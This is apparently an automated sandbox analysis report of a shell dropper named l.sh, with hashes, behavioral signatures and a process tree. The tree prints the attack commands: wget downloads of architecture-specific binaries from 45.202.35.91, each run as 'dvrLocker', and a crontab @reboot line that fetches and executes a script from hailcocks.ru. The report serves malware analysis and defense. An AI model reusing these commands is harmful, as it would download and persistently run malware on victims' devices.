Analysis
- max time kernel: 149s
- max time network: 150s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 08:41
Static task: static1
Behavioral task: behavioral1 (Sample: l.sh; Resource: ubuntu1804-amd64-20240729-en)
Behavioral task: behavioral2 (Sample: l.sh; Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: l.sh; Resource: debian9-mipsbe-20240418-en)
Behavioral task: behavioral4 (Sample: l.sh; Resource: debian9-mipsel-20240611-en)
General
- Target: l.sh
- Size: 916B
- MD5: 19c4fe1b103747e55af818fc3f07fdbe
- SHA1: ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
- SHA256: 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
- SHA512: 2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTPs, 9 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process): 816 chmod; 820 chmod; 833 chmod; 783 chmod; 789 chmod; 798 chmod; 800 sh; 811 chmod; 826 chmod
-
Executes dropped EXE (8 IoCs)
Processes (ioc, pid, process): /tmp/lib/dvrLocker 784 dvrLocker; /tmp/lib/dvrLocker 790 dvrLocker; /tmp/lib/dvrLocker 799 dvrLocker; /tmp/lib/dvrLocker 812 dvrLocker; /tmp/lib/dvrLocker 817 dvrLocker; /tmp/lib/dvrLocker 821 dvrLocker; /tmp/lib/dvrLocker 828 dvrLocker; /tmp/lib/dvrLocker 836 dvrLocker
-
Renames itself (1 IoCs)
Processes (pid, process): 799 dvrLocker
-
Unexpected DNS network traffic destination (2 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes (description, ioc): Destination IP 152.53.15.127; Destination IP 168.235.111.72
-
Creates/modifies Cron job (1 TTPs, 1 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process): File opened for modification /var/spool/cron/crontabs/tmp.x2KALa crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name (1 IoCs)
Processes (description, ioc, pid, process): Changes the process name, possibly in an attempt to hide itself; mini_httpd; 799 dvrLocker
-
System Network Configuration Discovery (1 TTPs, 2 IoCs)
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process): File opened for modification /tmp/lib/dvrLocker l.sh
Processes
(indentation shows parent/child depth; each entry: PID: image: command line [signatures])
- PID 640: /tmp/l.sh: /tmp/l.sh [Writes file to tmp directory]
  - PID 641: /bin/ls: ls -l /proc/1/exe [Reads runtime system information]
  - PID 647: /bin/ls: ls -l /proc/10/exe [Reads runtime system information]
  - PID 651: /bin/ls: ls -l /proc/106/exe [Reads runtime system information]
  - PID 654: /bin/ls: ls -l /proc/108/exe [Reads runtime system information]
  - PID 657: /bin/ls: ls -l /proc/109/exe [Reads runtime system information]
  - PID 660: /bin/ls: ls -l /proc/11/exe [Reads runtime system information]
  - PID 664: /bin/ls: ls -l /proc/12/exe
  - PID 667: /bin/ls: ls -l /proc/13/exe [Reads runtime system information]
  - PID 668: /bin/ls: ls -l /proc/137/exe
  - PID 671: /bin/ls: ls -l /proc/14/exe [Reads runtime system information]
  - PID 673: /bin/ls: ls -l /proc/141/exe
  - PID 676: /bin/ls: ls -l /proc/146/exe
  - PID 679: /bin/ls: ls -l /proc/147/exe [Reads runtime system information]
  - PID 680: /bin/ls: ls -l /proc/15/exe
  - PID 682: /bin/ls: ls -l /proc/16/exe [Reads runtime system information]
  - PID 683: /bin/ls: ls -l /proc/167/exe [Reads runtime system information]
  - PID 685: /bin/ls: ls -l /proc/17/exe [Reads runtime system information]
  - PID 686: /bin/ls: ls -l /proc/18/exe
  - PID 687: /bin/ls: ls -l /proc/19/exe
  - PID 688: /bin/ls: ls -l /proc/2/exe
  - PID 689: /bin/ls: ls -l /proc/20/exe
  - PID 690: /bin/ls: ls -l /proc/200/exe
  - PID 691: /bin/ls: ls -l /proc/21/exe
  - PID 692: /bin/ls: ls -l /proc/219/exe
  - PID 693: /bin/ls: ls -l /proc/22/exe
  - PID 694: /bin/ls: ls -l /proc/23/exe [Reads runtime system information]
  - PID 695: /bin/ls: ls -l /proc/24/exe
  - PID 696: /bin/ls: ls -l /proc/25/exe
  - PID 697: /bin/ls: ls -l /proc/26/exe [Reads runtime system information]
  - PID 698: /bin/ls: ls -l /proc/268/exe [Reads runtime system information]
  - PID 699: /bin/ls: ls -l /proc/269/exe
  - PID 700: /bin/ls: ls -l /proc/27/exe
  - PID 701: /bin/ls: ls -l /proc/271/exe
  - PID 704: /bin/ls: ls -l /proc/273/exe
  - PID 706: /bin/ls: ls -l /proc/274/exe
  - PID 708: /bin/ls: ls -l /proc/28/exe [Reads runtime system information]
  - PID 709: /bin/ls: ls -l /proc/29/exe [Reads runtime system information]
  - PID 712: /bin/ls: ls -l /proc/3/exe [Reads runtime system information]
  - PID 713: /bin/ls: ls -l /proc/305/exe
  - PID 716: /bin/ls: ls -l /proc/308/exe [Reads runtime system information]
  - PID 717: /bin/ls: ls -l /proc/309/exe [Reads runtime system information]
  - PID 719: /bin/ls: ls -l /proc/321/exe [Reads runtime system information]
  - PID 721: /bin/ls: ls -l /proc/4/exe
  - PID 723: /bin/ls: ls -l /proc/41/exe [Reads runtime system information]
  - PID 725: /bin/ls: ls -l /proc/42/exe [Reads runtime system information]
  - PID 727: /bin/ls: ls -l /proc/43/exe
  - PID 728: /bin/ls: ls -l /proc/5/exe
  - PID 730: /bin/ls: ls -l /proc/573/exe
  - PID 731: /bin/ls: ls -l /proc/586/exe [Reads runtime system information]
  - PID 733: /bin/ls: ls -l /proc/591/exe [Reads runtime system information]
  - PID 735: /bin/ls: ls -l /proc/593/exe [Reads runtime system information]
  - PID 737: /bin/ls: ls -l /proc/594/exe [Reads runtime system information]
  - PID 739: /bin/ls: ls -l /proc/6/exe
  - PID 741: /bin/ls: ls -l /proc/625/exe [Reads runtime system information]
  - PID 742: /bin/ls: ls -l /proc/632/exe
  - PID 744: /bin/ls: ls -l /proc/633/exe
  - PID 745: /bin/ls: ls -l /proc/635/exe [Reads runtime system information]
  - PID 747: /bin/ls: ls -l /proc/637/exe
  - PID 749: /bin/ls: ls -l /proc/638/exe [Reads runtime system information]
  - PID 751: /bin/ls: ls -l /proc/639/exe
  - PID 753: /bin/ls: ls -l /proc/640/exe
  - PID 754: /bin/ls: ls -l /proc/7/exe
  - PID 757: /bin/ls: ls -l /proc/76/exe
  - PID 760: /bin/ls: ls -l /proc/8/exe
  - PID 761: /bin/ls: ls -l /proc/9/exe
  - PID 765: /bin/ls: ls -l /proc/98/exe [Reads runtime system information]
  - PID 767: /bin/rm: rm -rf /tmp/lib/
  - PID 769: /bin/rm: rm -rf /tmp/lib/dvrLocker
  - PID 770: /bin/mkdir: mkdir /tmp/lib/ [Reads runtime system information]
  - PID 773: /usr/bin/wget: wget http://45.202.35.91/mpsl -O -
  - PID 783: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 784: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 787: /bin/rm: rm -rf mpsl
  - PID 788: /usr/bin/wget: wget http://45.202.35.91/mips -O - [System Network Configuration Discovery]
  - PID 789: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 790: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 792: /bin/rm: rm -rf mips [System Network Configuration Discovery]
  - PID 793: /usr/bin/wget: wget http://45.202.35.91/arm -O -
  - PID 798: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 799: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE; Renames itself; Changes its process name; Reads runtime system information]
    - PID 800: /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" [File and Directory Permissions Modification]
      - PID 802: /usr/bin/crontab: crontab - [Creates/modifies Cron job; Reads runtime system information]
      - PID 803: /usr/bin/crontab: crontab -l [Reads runtime system information]
  - PID 809: /bin/rm: rm -rf arm
  - PID 811: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 812: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 813: /bin/rm: rm -rf arm5
  - PID 815: /usr/bin/wget: wget http://45.202.35.91/ppc -O -
  - PID 816: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 817: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 818: /bin/rm: rm -rf ppc
  - PID 819: /usr/bin/wget: wget http://45.202.35.91/arm7 -O -
  - PID 820: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 821: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 823: /bin/rm: rm -rf arm7
  - PID 824: /usr/bin/wget: wget http://45.202.35.91/arm6 -O -
  - PID 826: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 828: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 830: /bin/rm: rm -rf arm6
  - PID 831: /usr/bin/wget: wget http://45.202.35.91/x86 -O -
  - PID 833: /bin/chmod: chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 836: /tmp/lib/dvrLocker: ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 839: /bin/rm: rm -rf /mnt/dvrLocker
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 100KB
  MD5: 4ad582d49f505bfab7de84881998685b
  SHA1: 5f09f4baed114b594729ded91e2c4d263f0e2754
  SHA256: b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
  SHA512: 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
- Filesize: 99KB
  MD5: 559f129d380ad1cfb60792c6b2dc3d32
  SHA1: 3997a0fc0bd5958783f1751364ec407c5b170adc
  SHA256: fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
  SHA512: 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
- Filesize: 77KB
  MD5: d09db60a70d5b53b5b53ad39476fd7e8
  SHA1: 73a75e5e8200f77d857a7256cc0979077e29241d
  SHA256: 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
  SHA512: ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
- Filesize: 306B
  MD5: c8f52a3f659ca7c7be0a52692aa80acb
  SHA1: 1e01d51afb31de66a9a6896f490cbdc600d6fbb2
  SHA256: 0c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10
  SHA512: 9c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f